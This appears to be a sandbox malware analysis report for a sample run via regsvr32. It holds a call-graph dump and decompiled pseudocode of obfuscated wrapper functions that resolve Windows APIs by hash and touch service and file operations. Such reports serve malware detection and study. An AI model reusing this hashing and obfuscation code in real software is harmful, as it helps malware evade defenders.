29e373 2 API calls 4849->4851 4850->4841 4850->4844 4850->4845 4850->4846 4850->4848 4850->4849 4852 28b200 GetPEB 4850->4852 4853 282c31 4850->4853 4854 284bb4 2 API calls 4850->4854 4855 29734a GetPEB 4850->4855 4856 28b9d7 GetPEB 4850->4856 4857 289b80 3 API calls 4850->4857 4944 2a0e6d 4850->4944 4952 28fbf8 4850->4952 4955 28db59 4850->4955 4851->4853 4852->4850 4853->4061 4854->4850 4855->4850 4856->4850 4857->4850 4864 28d206 4858->4864 4859 29aa59 GetPEB 4859->4864 4861 28d23b 4862 290f7a GetPEB 4861->4862 4863 28d24f 4862->4863 4863->4061 4864->4859 4864->4861 4864->4863 4986 283c51 4864->4986 4994 290e0b 4864->4994 4872 2a1738 4866->4872 4867 29aa59 GetPEB 4867->4872 4868 2a1781 4868->4061 4869 2a176d 4871 290f7a GetPEB 4869->4871 4870 283c51 GetPEB 4870->4872 4871->4868 4872->4867 4872->4868 4872->4869 4872->4870 4873 290e0b GetPEB 4872->4873 4873->4872 4889 29710c 4874->4889 4875 289574 GetPEB 4875->4889 4876 297128 4877 2966c2 2 API calls 4876->4877 4879 29715b 4877->4879 4878 28ffde GetPEB 4878->4889 4880 284bb4 2 API calls 4879->4880 4881 29717e 4880->4881 4883 29734a GetPEB 4881->4883 4882 28b200 GetPEB 4882->4889 4885 2971be 4883->4885 4884 284bb4 2 API calls 4884->4889 4886 28b9d7 GetPEB 4885->4886 4888 2971d6 4886->4888 4887 29734a GetPEB 4887->4889 4890 2963f0 3 API calls 4888->4890 4889->4875 4889->4876 4889->4878 4889->4882 4889->4884 4889->4887 4891 28b9d7 GetPEB 4889->4891 4892 297210 4889->4892 4893 289b80 3 API calls 4889->4893 4890->4892 4891->4889 4892->4061 4893->4889 4895 290f8d 4894->4895 4898 2a1bd6 4895->4898 4899 2a1bf5 4898->4899 4900 29bff0 GetPEB 4899->4900 4901 291069 4900->4901 4901->4801 4903 29641e 4902->4903 4904 28b184 GetPEB 4903->4904 4905 29663b 4904->4905 4923 2946e0 4905->4923 4907 296676 4908 296683 4907->4908 4909 29e373 2 API calls 4907->4909 4908->4811 4910 2966a3 4909->4910 4911 29e373 2 API calls 4910->4911 4911->4908 4913 28b219 4912->4913 4914 28f2b9 GetPEB 4913->4914 4915 28b2e7 4914->4915 4915->4816 4918 289b9f 4916->4918 4919 29bf1c 2 API calls 4918->4919 4920 289e5e 4918->4920 4922 289e5c 4918->4922 4927 29454e 4918->4927 4919->4918 4921 29e373 2 API calls 4920->4921 4921->4922 4922->4816 4924 29471e 4923->4924 4925 29bff0 GetPEB 4924->4925 4926 2947b3 CreateProcessW 4925->4926 4926->4907 4928 294575 4927->4928 4929 29bff0 GetPEB 4928->4929 4930 294615 4929->4930 4930->4918 4932 29bff0 GetPEB 4931->4932 4933 29e0c1 4932->4933 4933->4838 4935 28f7a0 4934->4935 4936 28f983 4935->4936 4937 28f985 4935->4937 4939 29eaa3 2 API calls 4935->4939 4936->4838 4938 284627 GetPEB 4937->4938 4938->4936 4939->4935 4941 28d7d6 4940->4941 4942 29bff0 GetPEB 4941->4942 4943 28d87c 4942->4943 4943->4838 4947 2a0e92 4944->4947 4946 28fbf8 GetPEB 4946->4947 4947->4946 4948 2a1076 4947->4948 4949 2a1061 4947->4949 4966 29d0a1 4947->4966 4970 282f1a 4947->4970 4948->4850 4951 29e373 2 API calls 4949->4951 4951->4948 4953 29bff0 GetPEB 4952->4953 4954 28fcac 4953->4954 4954->4850 4964 28db99 4955->4964 4957 28b184 GetPEB 4957->4964 4958 28df48 4974 2a1d6d 4958->4974 4960 28e07b 4960->4960 4961 284bb4 2 API calls 4961->4964 4964->4957 4964->4958 4964->4960 4964->4961 4965 28b9d7 GetPEB 4964->4965 4978 295a47 4964->4978 4982 29e8e7 4964->4982 4965->4964 4967 29d0bd 4966->4967 4968 29bff0 GetPEB 4967->4968 4969 29d13e 4968->4969 4969->4947 4971 282f3e 4970->4971 4972 29bff0 GetPEB 4971->4972 4973 282fcc 4972->4973 4973->4947 4975 2a1d80 4974->4975 4976 29bff0 GetPEB 4975->4976 4977 28df59 4976->4977 4977->4850 4979 295a82 4978->4979 4980 29bff0 GetPEB 4979->4980 4981 295b29 4980->4981 4981->4964 4983 29e902 4982->4983 4984 29bff0 GetPEB 4983->4984 4985 29e994 4984->4985 4985->4964 4987 283c6f 4986->4987 4990 283eff 4987->4990 4999 293ff6 4987->4999 4990->4864 4991 291d1c GetPEB 4992 283eb6 4991->4992 4992->4990 4993 291d1c GetPEB 4992->4993 4993->4992 4997 290e27 4994->4997 4995 290f48 4995->4864 4996 29e9a4 GetPEB 4996->4997 4997->4995 4997->4996 5003 283455 4997->5003 5000 294017 4999->5000 5001 29bff0 GetPEB 5000->5001 5002 283e94 5001->5002 5002->4990 5002->4991 5004 283468 5003->5004 5005 29bff0 GetPEB 5004->5005 5006 283502 5005->5006 5006->4997 5008 29da29 5007->5008 5009 29bff0 GetPEB 5008->5009 5010 283149 5009->5010 5010->3884 5012 295cca 5011->5012 5013 29bff0 GetPEB 5012->5013 5014 295d5a 5013->5014 5014->4077 5016 2900ae 5015->5016 5017 29eaa3 2 API calls 5016->5017 5018 29040e 5016->5018 5019 297394 GetPEB 5016->5019 5017->5016 5018->4077 5019->5016 5021 28f61e 5020->5021 5022 29bff0 GetPEB 5021->5022 5023 28f6be 5022->5023 5023->4077 5025 29bff0 GetPEB 5024->5025 5026 28e370 5025->5026 5026->4077 5028 28f9bd 5027->5028 5029 29bff0 GetPEB 5028->5029 5030 28fa61 5029->5030 5030->4081 5032 295c1b 5031->5032 5033 29bff0 GetPEB 5032->5033 5034 295ca5 5033->5034 5034->4086 5036 28e0fe 5035->5036 5037 29bff0 GetPEB 5036->5037 5038 28e19d 5037->5038 5038->4086 5042 28d8af 5039->5042 5041 28da67 5063 28ff02 5041->5063 5042->5041 5044 28b184 GetPEB 5042->5044 5045 28da65 5042->5045 5059 291c3c 5042->5059 5044->5042 5045->4103 5048 289425 5046->5048 5047 284bb4 2 API calls 5047->5048 5048->5047 5049 283f09 GetPEB 5048->5049 5050 28954c 5048->5050 5053 28954a 5048->5053 5054 28b9d7 GetPEB 5048->5054 5067 29462a 5048->5067 5049->5048 5051 283152 GetPEB 5050->5051 5051->5053 5053->4103 5054->5048 5056 28f6e5 5055->5056 5057 29bff0 GetPEB 5056->5057 5058 28f778 5057->5058 5058->4112 5060 291c5e 5059->5060 5061 29bff0 GetPEB 5060->5061 5062 291d0f 5061->5062 5062->5042 5064 28ff24 5063->5064 5065 29bff0 GetPEB 5064->5065 5066 28ffca 5065->5066 5066->5045 5068 294649 5067->5068 5069 29bff0 GetPEB 5068->5069 5070 2946d3 5069->5070 5070->5048 5114 285c9a 5123 28617c 5114->5123 5115 286a8d GetPEB 5115->5123 5116 29bf1c 2 API calls 5116->5123 5117 28638d 5118 289574 GetPEB 5118->5123 5120 28638f 5121 29e373 2 API calls 5120->5121 5121->5117 5122 28ffde GetPEB 5122->5123 5123->5115 5123->5116 5123->5117 5123->5118 5123->5120 5123->5122 5124 29eaa3 2 API calls 5123->5124 5126 29589f GetPEB 5123->5126 5127 29ab39 5123->5127 5131 2a2727 5123->5131 5124->5123 5126->5123 5128 29ab6c 5127->5128 5129 29bff0 GetPEB 5128->5129 5130 29ac10 5129->5130 5130->5123 5132 2a2737 5131->5132 5133 29bff0 GetPEB 5132->5133 5134 2a27d3 5133->5134 5134->5123 5097 2872cc 5098 28ffde GetPEB 5097->5098 5099 28750d 5098->5099 5110 29589f 5099->5110 5102 284bb4 2 API calls 5103 28753e 5102->5103 5104 29734a GetPEB 5103->5104 5105 287568 5104->5105 5106 28b9d7 GetPEB 5105->5106 5107 287577 5106->5107 5108 289ea8 2 API calls 5107->5108 5109 28758b 5108->5109 5111 2958b2 5110->5111 5112 29bff0 GetPEB 5111->5112 5113 287520 5112->5113 5113->5102 5113->5109 5071 2963f0 5072 29641e 5071->5072 5073 28b184 GetPEB 5072->5073 5074 29663b 5073->5074 5075 2946e0 2 API calls 5074->5075 5076 296676 5075->5076 5077 296683 5076->5077 5078 29e373 2 API calls 5076->5078 5079 2966a3 5078->5079 5080 29e373 2 API calls 5079->5080 5080->5077 5081 2888e5 5083 288a5e 5081->5083 5082 288aa9 5083->5082 5084 29e18b 2 API calls 5083->5084 5085 288a79 5084->5085 5089 2908c0 5085->5089 5088 28b9d7 GetPEB 5088->5082 5092 2908e5 5089->5092 5090 288a91 5090->5088 5092->5090 5093 2919a4 5092->5093 5094 2919bd 5093->5094 5095 29bff0 GetPEB 5094->5095 5096 291a63 5095->5096 5096->5092

                                                                                                                Executed Functions

                                                                                                                Function 0028F1D5 Relevance: 1.6, APIs: 1, Instructions: 69COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0028F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00289E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E0029BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

















                                                                                                                0x0028f1e5
                                                                                                                0x0028f1ea
                                                                                                                0x0028f1f5
                                                                                                                0x0028f1fa
                                                                                                                0x0028f203
                                                                                                                0x0028f20a
                                                                                                                0x0028f20d
                                                                                                                0x0028f210
                                                                                                                0x0028f217
                                                                                                                0x0028f21b
                                                                                                                0x0028f21f
                                                                                                                0x0028f226
                                                                                                                0x0028f22d
                                                                                                                0x0028f23a
                                                                                                                0x0028f23e
                                                                                                                0x0028f241
                                                                                                                0x0028f245
                                                                                                                0x0028f24c
                                                                                                                0x0028f253
                                                                                                                0x0028f25a
                                                                                                                0x0028f25e
                                                                                                                0x0028f265
                                                                                                                0x0028f276
                                                                                                                0x0028f279
                                                                                                                0x0028f27d
                                                                                                                0x0028f284
                                                                                                                0x0028f2a3
                                                                                                                0x0028f2b0
                                                                                                                0x0028f2b8

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0028F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: e2465403569062875c2ede7694c2b589caeb19cf62f37267c1561337926b1488
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 4C2144B5D0121DAFDB08DFA5C88A8EEBBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002832B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 2832b5-28338a call 289e7d call 29bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E002832B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00289E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E0029BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}














                                                                                                                0x002832be
                                                                                                                0x002832bf
                                                                                                                0x002832c2
                                                                                                                0x002832c3
                                                                                                                0x002832c8
                                                                                                                0x002832cd
                                                                                                                0x002832d6
                                                                                                                0x002832d9
                                                                                                                0x002832dc
                                                                                                                0x002832e9
                                                                                                                0x002832ec
                                                                                                                0x002832f4
                                                                                                                0x002832f5
                                                                                                                0x002832fa
                                                                                                                0x00283304
                                                                                                                0x0028330b
                                                                                                                0x0028330f
                                                                                                                0x00283316
                                                                                                                0x0028331d
                                                                                                                0x00283324
                                                                                                                0x00283335
                                                                                                                0x00283338
                                                                                                                0x0028333c
                                                                                                                0x00283343
                                                                                                                0x0028334a
                                                                                                                0x00283361
                                                                                                                0x00283364
                                                                                                                0x00283377
                                                                                                                0x00283384
                                                                                                                0x0028338a

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00283384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: 3eb39d8c2b30a9b3b832e566e5655433278e0da0ebee8117d3abc05228d69ea6
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: 6D2123B5D01228FBCB04DFA9D84A9EEBFB5FB40304F208189E424A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0028C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 28c4eb-28c5c2 call 289e7d call 29bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0028C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00289E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E0029BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}














                                                                                                                0x0028c4f2
                                                                                                                0x0028c4f5
                                                                                                                0x0028c4f7
                                                                                                                0x0028c4fa
                                                                                                                0x0028c4fd
                                                                                                                0x0028c500
                                                                                                                0x0028c501
                                                                                                                0x0028c502
                                                                                                                0x0028c507
                                                                                                                0x0028c50e
                                                                                                                0x0028c515
                                                                                                                0x0028c51c
                                                                                                                0x0028c523
                                                                                                                0x0028c52a
                                                                                                                0x0028c52d
                                                                                                                0x0028c531
                                                                                                                0x0028c538
                                                                                                                0x0028c53f
                                                                                                                0x0028c556
                                                                                                                0x0028c55e
                                                                                                                0x0028c562
                                                                                                                0x0028c569
                                                                                                                0x0028c570
                                                                                                                0x0028c577
                                                                                                                0x0028c57e
                                                                                                                0x0028c585
                                                                                                                0x0028c58c
                                                                                                                0x0028c593
                                                                                                                0x0028c59a
                                                                                                                0x0028c5ad
                                                                                                                0x0028c5bc
                                                                                                                0x0028c5c2

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0028C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 2d5a3be4876718a58e88aae66b74ee29f2d9bd3171ba26231cab08e1a53901c1
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 8A2120B6C1120DEBCF15DFA4D9499EEBBB4FF04318F108598E92566260E3B25B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0029A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 29a98e-29aa51 call 289e7d call 29bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0029A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00289E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E0029BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}













                                                                                                                0x0029a994
                                                                                                                0x0029a997
                                                                                                                0x0029a99c
                                                                                                                0x0029a9a1
                                                                                                                0x0029a9a7
                                                                                                                0x0029a9ae
                                                                                                                0x0029a9b5
                                                                                                                0x0029a9c2
                                                                                                                0x0029a9c5
                                                                                                                0x0029a9c8
                                                                                                                0x0029a9cf
                                                                                                                0x0029a9db
                                                                                                                0x0029a9dc
                                                                                                                0x0029a9e1
                                                                                                                0x0029a9eb
                                                                                                                0x0029a9f2
                                                                                                                0x0029a9f9
                                                                                                                0x0029aa00
                                                                                                                0x0029aa17
                                                                                                                0x0029aa1a
                                                                                                                0x0029aa2b
                                                                                                                0x0029aa2e
                                                                                                                0x0029aa41
                                                                                                                0x0029aa4c
                                                                                                                0x0029aa51

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0029AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: 11025f1030301430edca81d58f83a8729e5e47c4f7176187500e46e1e50bc6aa
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: CB2117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE404AB250D7B59B549F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0028338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 28338b-283454 call 289e7d call 29bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0028338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00289E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E0029BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}













                                                                                                                0x00283391
                                                                                                                0x00283396
                                                                                                                0x0028339b
                                                                                                                0x002833a1
                                                                                                                0x002833a5
                                                                                                                0x002833ac
                                                                                                                0x002833b9
                                                                                                                0x002833bd
                                                                                                                0x002833c0
                                                                                                                0x002833c7
                                                                                                                0x002833d8
                                                                                                                0x002833db
                                                                                                                0x002833f2
                                                                                                                0x002833f5
                                                                                                                0x002833fc
                                                                                                                0x00283403
                                                                                                                0x0028340a
                                                                                                                0x0028340e
                                                                                                                0x00283415
                                                                                                                0x0028341c
                                                                                                                0x00283427
                                                                                                                0x0028342a
                                                                                                                0x00283431
                                                                                                                0x00283444
                                                                                                                0x0028344f
                                                                                                                0x00283454

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0028344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: b71c036e68771700f23c09e3bf1d9a251fe517aa64e538928bd2110e4a7ef540
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: ED2136B4D01209EFCF04DFA5C94AAEEBFB4FB00304F108189E424AA290D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0029E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0029E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00289E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E0029BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}











                                                                                                                0x0029e37a
                                                                                                                0x0029e37d
                                                                                                                0x0029e37f
                                                                                                                0x0029e382
                                                                                                                0x0029e384
                                                                                                                0x0029e389
                                                                                                                0x0029e392
                                                                                                                0x0029e399
                                                                                                                0x0029e3a0
                                                                                                                0x0029e3a7
                                                                                                                0x0029e3ae
                                                                                                                0x0029e3b5
